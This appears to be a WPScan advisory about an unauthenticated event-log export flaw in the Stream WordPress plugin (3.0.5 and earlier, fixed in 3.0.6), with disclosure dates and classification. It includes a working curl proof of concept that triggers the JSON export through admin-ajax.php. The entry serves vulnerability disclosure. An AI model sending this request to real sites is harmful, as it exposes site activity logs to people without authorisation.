Stream <= 3.0.5 - Unauthenticated Events Export

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries.

Reported to maintainers on 5/25/2016 and new version released 5/30/2016
Proof of Concept
curl -i -X POST    -H "Content-Type:application/x-www-form-urlencoded"    -d "action=nonexistingaction"  'http://example.com/wordpress/wp-admin/admin-ajax.php?page=wp_stream&record-actions=export-json'

Affects

Plugin stream
fixed in version 3.0.6

References

URL https://wordpress.org/plugins/stream/changelog/

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter James Golovich
Submitter Website http://pritect.net
Submitter Twitter Pritect
Views 154
Verified No
WPVDB ID 8504

Timeline

Publicly Published 2016-05-31 (6 months ago)
Added 2016-05-31 (6 months ago)
Last Updated 2016-05-31 (6 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.